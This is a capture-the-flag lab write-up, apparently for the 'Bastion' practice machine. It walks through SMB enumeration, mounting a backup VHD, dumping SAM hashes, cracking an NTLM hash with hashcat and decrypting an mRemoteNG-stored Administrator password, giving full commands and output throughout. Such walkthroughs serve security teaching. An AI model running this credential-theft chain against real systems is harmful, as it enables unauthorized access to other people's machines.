$nmap -A -p- -T4 10.10.10.134
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 08:49 CET
Nmap scan report for 10.10.10.134
Host is up (0.036s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-03T08:50:53+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-03T07:50:49
|_ start_date: 2020-12-03T07:47:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.94 secondsOpen ports:
- 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
- 135/tcp open msrpc Microsoft Windows RPC
- 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
- 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
- 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 49664/tcp open msrpc Microsoft Windows RPC
- 49665/tcp open msrpc Microsoft Windows RPC
- 49666/tcp open msrpc Microsoft Windows RPC
- 49667/tcp open msrpc Microsoft Windows RPC
- 49668/tcp open msrpc Microsoft Windows RPC
- 49669/tcp open msrpc Microsoft Windows RPC
- 49670/tcp open msrpc Microsoft Windows RPC
As smb port is open, let’s check it.
$smbclient -N -L \\10.10.10.134\
Sharename Type Comment
-------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup availableWe can access to Backup share.
$smbclient -N \\10.10.10.134\Backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 12:02:11 2019
.. D 0 Tue Apr 16 12:02:11 2019
note.txt AR 116 Tue Apr 16 12:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
735807 blocks of size 4096. 2763904 blocks availablesmb: > mget note.txt
Get file note.txt? yes
getting file \note.txt of size 116 as note.txt (0,7 KiloBytes/sec) (average 0,7 KiloBytes/sec)smb: > cd WindowsImageBackup\
smb: \WindowsImageBackup> dir
. Dn 0 Fri Feb 22 13:44:02 2019
.. Dn 0 Fri Feb 22 13:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763904 blocks availablesmb: \WindowsImageBackup> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC> dir
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 13:45:32 2019
Catalog Dn 0 Fri Feb 22 13:45:32 2019
MediaId An 16 Fri Feb 22 13:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763901 blocks availablesmb: \WindowsImageBackup\L4mpje-PC> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351> dir
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 13:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 13:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763389 blocks availableWe find two vhd files.
A vhd file is a Virtual Hark Disk. More information can be found on
https://en.wikipedia.org/wiki/VHD_(file_format)
As file note.txt says,
$cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.We can’t download these files from our local box, so we need to find a different approach.
Searching on google we find ways that help us to mount these files remotely.
https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
https://www.jamescoyle.net/tag/qemu-nbd
$cd /mnt/
$sudo mkdir remote
$sudo mount -t cifs //10.10.10.134/Backups/ /mnt/remote/ -o rw
$cd remote/
$ls
note.txt SDT65CB.tmp WindowsImageBackup$cd WindowsImageBackup/
$ls
L4mpje-PC$cd L4mpje-PC/
$ls
'Backup 2019-02-22 124351' Catalog MediaId SPPMetadataCache$cd Backup\ 2019-02-22\ 124351/
$ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml$cd /mnt/
$ls
remote$sudo mkdir vhd
$qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
qemu-nbd: Failed to open /dev/nbd0: No such file or directory
qemu-nbd: Disconnect client, due to: Failed to read request: Unexpected end-of-file before all bytes were read$cd /dev/
$sudo modprobe nbd$sudo qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd$sudo mount -r /dev/nbd0p1 /mnt/vhd
$cd /mnt/vhd/
$ls
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs 'Program Files' ProgramData Recovery 'System Volume Information' Users Windows$cd Users/L4mpje/Desktop
$ls
desktop.iniThere is no user flag.
Let’s perform then an in deep analysis of the Windows system.
One of the first elements to check is the Security Account Manager.
https://en.wikipedia.org/wiki/Security_Account_Manager
$ls -la
total 74740
drwxrwxrwx 1 root root 12288 feb 22 2019 .
drwxrwxrwx 1 root root 655360 feb 22 2019 ..
-rwxrwxrwx 2 root root 28672 feb 22 2019 BCD-Template
-rwxrwxrwx 2 root root 25600 feb 22 2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 feb 22 2019 COMPONENTS
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root 65536 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root 65536 feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root 524288 feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root 524288 jul 14 2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root 1024 abr 12 2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root 262144 feb 22 2019 DEFAULT
-rwxrwxrwx 1 root root 1024 abr 12 2011 DEFAULT.LOG
-rwxrwxrwx 2 root root 91136 feb 22 2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 DEFAULT.LOG2
drwxrwxrwx 1 root root 0 jul 14 2009 Journal
drwxrwxrwx 1 root root 0 feb 22 2019 RegBack
-rwxrwxrwx 1 root root 262144 feb 22 2019 SAM
-rwxrwxrwx 1 root root 1024 abr 12 2011 SAM.LOG
-rwxrwxrwx 2 root root 21504 feb 22 2019 SAM.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SAM.LOG2
-rwxrwxrwx 1 root root 262144 feb 22 2019 SECURITY
-rwxrwxrwx 1 root root 1024 abr 12 2011 SECURITY.LOG
-rwxrwxrwx 2 root root 21504 feb 22 2019 SECURITY.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 feb 22 2019 SOFTWARE
-rwxrwxrwx 1 root root 1024 abr 12 2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root 9699328 feb 22 2019 SYSTEM
-rwxrwxrwx 1 root root 1024 abr 12 2011 SYSTEM.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SYSTEM.LOG2
drwxrwxrwx 1 root root 4096 nov 20 2010 systemprofile
drwxrwxrwx 1 root root 4096 feb 22 2019 TxRWe have access to SAM and SYSTEM files.
They can be used to obtain deeper access.
$samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::Let’s crack L4mpje’s hash.
$hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 2868/2932 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Thu Dec 3 11:09:03 2020 (8 secs)
Time.Estimated...: Thu Dec 3 11:09:11 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1398.6 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: burlfish85 -> burbank105
Started: Thu Dec 3 11:08:39 2020
Stopped: Thu Dec 3 11:09:12 2020The password is bureaulampje.
Now we just need to access by ssh to L4mpje0’s account.
$ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfeXXXXXXXXXXXXXXXXXXXXXXXXXXXXLet’s search for our admin’s flag.
PS C:\Program Files (x86)> dir
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell
PS C:\Program Files (x86)>There is an installation of mRemoteNG.
mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.
https://mremoteng.org/
PS C:\Program Files (x86)\mRemoteNG> type .\Changelog.txt
1.76.11 (2018-10-18):
Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized
1.76.10 (2018-10-07):
Fixes:
------
#1124: Enabling themes causes an exception
1.76.9 (2018-10-07):
Fixes:
------
#1117: Duplicate panel created when "Reconnect on Startup" and "Create Empty Panel" settings enabled
#1115: Exception when changing from xml data storage to SQLAccording to this file, we have a mRemoteNG version 1.76.11
Based on this information this version is vulnerable.
https://hackersvanguard.com/mremoteng-insecure-password-storage/
$scp l4mpje@10.10.10.134:./AppData/Roaming/mRemoteNG/confCons.xml .
l4mpje@10.10.10.134's password:
confCons.xml 100% 6316 154.2KB/s 00:00$ls
confCons.xml hash.txt$cat confCons.xml
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node
Name="DC"
Type="Connection"
Descr="" Icon="mRemoteNG"
Panel="General"
Id="500e7d58-662a-44d4-aff0-3a4f547a3fee"
Username="Administrator"
Domain=""
Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"
Protocol="RDP"
...We can now decrypt the password.
https://github.com/haseebT/mRemoteNG-Decrypt
$wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
--2020-12-03 12:24:53-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1535 (1,5K) [text/plain]
Grabando a: “mremoteng_decrypt.py”
mremoteng_decrypt.py 100%[=============================================================================================================================================================>] 1,50K --.-KB/s en 0s
2020-12-03 12:24:53 (4,42 MB/s) - “mremoteng_decrypt.py” guardado [1535/1535]$python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2The Administrator password is then thXLHM96BeKL0ER2.
Finally, we can connect as Administrator.
$ssh administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>administrator@BASTION C:\Users\Administrator>whoami
bastion\administratoradministrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
9588XXXXXXXXXXXXXXXXXXXXXXXXXXXX